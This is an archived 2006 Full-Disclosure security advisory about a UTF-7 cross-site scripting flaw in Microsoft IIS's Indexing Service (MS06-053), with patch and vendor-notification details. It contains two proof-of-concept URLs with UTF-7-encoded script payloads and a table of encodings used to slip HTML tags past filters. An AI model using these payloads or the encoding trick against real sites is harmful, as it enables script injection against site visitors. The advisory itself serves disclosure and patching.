lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <000101c6e50e$27137fd0$6401a8c0@Zarathustra>
Date: Sun, 1 Oct 2006 13:00:37 +0900
From: "Eiji James Yoshida" <ptrs-ejy@...iij4u.or.jp>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Microsoft Internet Information Services UTF-7 XSS
	Vulnerability [MS06-053]

+ Title:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft Internet Information Services UTF-7 XSS Vulnerability
[http://www.geocities.jp/ptrs_sec/advisory09e.html]


+ Date:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
1 October 2006


+ Author:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Eiji James Yoshida [ptrs-ejy@...iij4u.or.jp]


+ Risk:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Medium


+ Vulnerable:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Internet Information Services


+ Overview:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Using UTF-7 encoded URLs, IIS may return user specified content to the browser. 

If 'Encoding' is set to 'Auto Select', and Internet Explorer finds a UTF-7 string in the response's body, it will set the charset
encoding to UTF-7 automatically, unless a certain charset encoding is already enforced.


+ Proof of concept:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://MaliciousSite/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
http://MaliciousSite/+ADw-SCRIPT+AD4-alert('XSS');+ADw-+AC8-SCRIPT+AD4-.ida

UTF-7("<") = +ADw-, +ADx-, +ADy-, +ADz-
UTF-7(">") = +AD4-, +AD5-, +AD6-, +AD7-
UTF-7("/") = +AC8-, +AC9-


+ Patch:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft Security Bulletin MS06-053
Vulnerability in Indexing Service Could Allow Cross-Site Scripting (920685)
[http://www.microsoft.com/technet/security/bulletin/ms06-053.mspx]


+ Vendor status:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
IPA/ISEC was notified on the 27th December 2005.
Microsoft has released a patch for this vulnerability on the 12th September 2006. 


+ Similar vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
XSS vulnerabilities in Google.com
[http://www.watchfire.com/securityzone/advisories/12-21-05.aspx]

Microsoft Security Bulletin (MS00-084)
Patch Available for 'Indexing Services Cross Site Scripting'
[http://www.microsoft.com/technet/security/bulletin/ms00-084.mspx]


-------------------------------------------------
Eiji James Yoshida
penetration technique research site
E-mail: ptrs-ejy@...iij4u.or.jp
URL: http://www.geocities.jp/ptrs_sec/index.htm
-------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ